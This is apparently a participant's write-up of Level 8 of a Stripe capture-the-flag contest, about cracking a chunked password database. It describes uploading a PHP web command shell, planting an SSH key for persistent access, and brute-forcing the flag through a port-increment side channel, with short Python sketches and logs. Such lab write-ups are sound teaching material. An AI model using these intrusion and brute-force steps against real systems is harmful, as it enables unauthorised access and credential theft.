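# unless you happened to guess the 12-digit flag.
```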

In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or they may live on a different machine for added security. PasswordDB comes with built-in security features, such as timing attack prevention, and protection against using inequitable amounts of CPU time − relative to other PasswordDB instances on the same machine.

For maximum security, the machine hosting the primary server has “Locked Down” network access. The server can make only outbound requests to other servers. However, as you learned in Level 5, someone forgot to firewall off the high ports internally from the Level 2 server. It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.

To maximize adoption, easy usability is also a goal of PasswordDB. Hence, a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. This script validates that your password looks like a valid Flag, automatically spinning up 4 chunk servers and a primary server.

 All I can say for this challenge is “Wow!” What a beast. Solving Level 8 took more than twice as long as challenges 0 through 7.

The Level 8 situation is as follows:

The level08 server starts a database that contains a random 12-digit password consisting only of numbers. Four “chunk” servers are then created, and each chunk server is given 3 digits of the password.

John-Kuskos:level08-code johnathankuskos$ ./password_db_launcher 111222333444
Split length 12 password into 4 chunks of size about 3: ['111', '222', '333', '444']
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Launched ['./chunk_server', '', '111'] (pid 87332)
Launched ['./chunk_server', '', '222'] (pid 87333)
Launched ['./chunk_server', '', '333'] (pid 87334)
Launched ['./chunk_server', '', '444'] (pid 87335)
Checking whether is reachable
Condition not yet true, waiting 0.35 seconds (try 1/10)
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Checking whether is reachable
Launched ['./primary_server', '-l', '/tmp/primary.lock', '-c', '', '-c', '', '-c'

After running this local copy of the database, you will observe that the application returns a single JSON string, either {"success": false} or {"success": true}, depending on whether the submitted 12-digit key was correct. To evaluate a submission, the server first breaks your 12-digit password into 4 chunks (if the password is 111222333444, chunk1 checks 111, chunk2 checks 222, and so on), and then checks the first chunk. If the chunk1 server evaluates its chunk as correct, the flow of logic continues to the chunk2 server, then to chunk3, until finally, if the first three chunks are all true, the last chunk server checks whether its own chunk is true.
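A minimal sketch of that chain (my own illustration of the logic described above, not PasswordDB’s actual code):

```python
def check_password(guess, chunks):
    """Each 'chunk server' compares its 3-digit slice in turn; the chain
    stops at the first mismatch, so later servers are never consulted."""
    for i, chunk in enumerate(chunks):
        if guess[i * 3:(i + 1) * 3] != chunk:
            return {"success": False}
    return {"success": True}

chunks = ["111", "222", "333", "444"]
check_password("111222333444", chunks)  # {"success": True}
check_password("111999333444", chunks)  # fails at chunk 2; chunks 3-4 untouched
```

The early exit is the whole vulnerability: how far the chain progresses depends on how much of the guess is correct.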

However, if the first chunk server fails its test, chunk servers 2, 3, and 4 are never consulted, and the user gets back a single {"success": false}. The same thing happens when the first and second chunks are correct but the third is incorrect: the chunk4 server never evaluates its chunk. It’s also possible to instruct the chunk servers to send their output to a webhook, if one is created:

[] Received payload: '{"password": "000000000000", "webhooks": []}'
Acquiring lock
[] Split length 12 password into 4 chunks of size about 3: [u'000', u'000', u'000', u'000']
[] Making request to chunk server ('', 2163) (remaining chunk servers: [('', 2164), ('', 2165), ('', 2166)])
[] Received payload: '{"password_chunk": "000"}'
[] Request already finished!
[] Responding with: '{"success": false}\n'
[] Going to wait 0.00488090515137 seconds before responding
[] Request already finished!
[] Responding with: '{"success": false}\n'
Releasing lock

Sadly, and serving as another brick wall, the level08 server is inaccessible to outside connections. There is absolutely no way for you to access it externally. However, the level08 server can talk to any of the other CTF servers. Remember our friend, the ever-so vulnerable level02 server?

Cracking the Code

Step 1. Obtaining a shell on level02

You already know that the level02 server has ssh capabilities. Because you can run PHP on the level02 server, you can test for command-line access. You can use the Ajax/PHP Command Shell − it’s quite popular and has great practical use in this step. Once the Ajax/PHP Command Shell is uploaded, you can use the browser as an interactive terminal on the level02 server.

Step 2. Obtaining SSH access

After obtaining command-line access, it’s as simple as creating an ssh public/private key pair and uploading the public key to the level02 server. After placing the public key in the correct directory (/mount/home/user-abcdefghij/.ssh/) and chmod’ing it to 600, you can get in with the command ssh

Step 3. Analysis

Before you can start attacking, you need to figure out how the database actually works. On the local copy of the database, I wrote a listener in Python to receive the callbacks from the password-check requests. What you will notice is that for the first chunk (testing passwords 000xxxxxxxxx through 999xxxxxxxxx), the ports coming back to the listener from the chunk servers increment by 3 if the submitted chunk was false, and by 4 if it was true. You then supply the correct first chunk and a test second chunk: assuming the correct first chunk is 123, you’re now testing passwords 123000xxxxxx through 123999xxxxxx. False guesses for chunk 2 result in an increment of 4, and the correct one increments by 5. The same pattern holds for the third chunk: a false submission increments by 5, and a true one by 6. For the final chunk, you just run the three known chunks plus each candidate final chunk against the level08 server and watch for {"success": false} or {"success": true}. If a true is encountered, you have your flag.
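Put together, the per-chunk brute force looks roughly like this. It’s a sketch: observe_delta is a hypothetical stand-in for the real network round trip, returning the port increment seen between consecutive chunk-server callbacks for a candidate; per the analysis above, a true guess for chunk N shows a delta of N+3:

```python
def crack_chunk(chunk_number, observe_delta):
    """Brute-force one 3-digit chunk via the port-delta side channel.
    observe_delta(candidate) must return the observed port increment."""
    for n in range(1000):
        candidate = "%03d" % n
        # chunk 1: false -> 3, true -> 4; chunk 2: false -> 4, true -> 5; etc.
        if observe_delta(candidate) == chunk_number + 3:
            return candidate
    return None
```

At most 1,000 guesses per chunk, so the full 12-digit space of 10^12 collapses to roughly 4,000 attempts.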

Step 4. Cracking the Code

With the methodology in place (and probably at least 2 days spent learning and implementing a 350-line script in Python), the brute-forcing script takes approximately 5 to 25 minutes to crack the 12-digit code, depending on the randomness of the chunks and the network traffic.

For instance, network traffic on the production servers differed heavily from WhiteHat’s local copy. In fact, we encountered a third test case − neither true nor false, but inconclusive − that we needed to retest. We would send one request and get back its response, but before we could send a second request, 3 to 20 other hackers participating in the challenge would have sent theirs. This resulted in a port difference of anywhere from roughly 7 to 200, depending on network traffic, with higher traffic meaning a higher difference.
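One way to handle an inconclusive reading is to keep retesting a candidate until the evidence is decisive. This is my own reconstruction of that idea, with simplified (hypothetical) delta conventions − the clean “false” delta is one less than the “true” delta, and anything else is treated as noise:

```python
def confirm_chunk(candidate, observe_delta, true_delta, needed=10):
    """Re-test a candidate until it is ruled out (a clean 'false' delta)
    or has matched the 'true' delta `needed` times."""
    hits = 0
    while hits < needed:
        delta = observe_delta(candidate)
        if delta == true_delta - 1:      # unambiguous false signature
            return False
        if delta == true_delta:          # one more vote for 'true'
            hits += 1
        # any other delta is noise from other players' traffic: just retry
    return True
```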

Because we could not rule out a chunk based on that value alone, we kept each candidate in a loop that repeatedly re-evaluated it, until it was either ruled out by matching our condition for a false chunk, or had matched our condition for a potentially true chunk at least 10 times. At the 10th match, we accepted the candidate as highly likely to be a true chunk, and then moved on to the next chunk. The entire brute-forcing output we used can be found here, along with the script that generated it here. The following output is from the end of our brute-force solution:

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "false"}

{"Success": "true"}

Flag Found: 204771432466

Solve time ~ 1767.952389 seconds

The brute-forcing approach was only possible because of the information leak provided by the chunk servers. Although this approach was probably the intended method for completing the challenge, in the real world we all too often encounter server responses that are too detailed. When you let users know exactly where information is originating, they know exactly where to focus their attacks.


This CTF was intense and sparked a new interest in exploitation for me. I can’t wait to participate in the next one.

Anything for a free t-shirt, right?



During the challenge, I did heavy research on Python, jQuery, and encryption in order to solve the challenges. Listed below are references that were very helpful to me:

“The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards and even then I have my doubts.”
~Dr. Eugene Spafford, Purdue University

Special thanks to Stripe, Inc.
The text above that appears in the brown italic font comes directly from the Stripe website: the description of each of the 8 Levels is quoted as Stripe originally wrote it. I did this to ensure that I accurately depicted this CTF as Stripe originally intended, and Stripe has granted permission for the use of the text.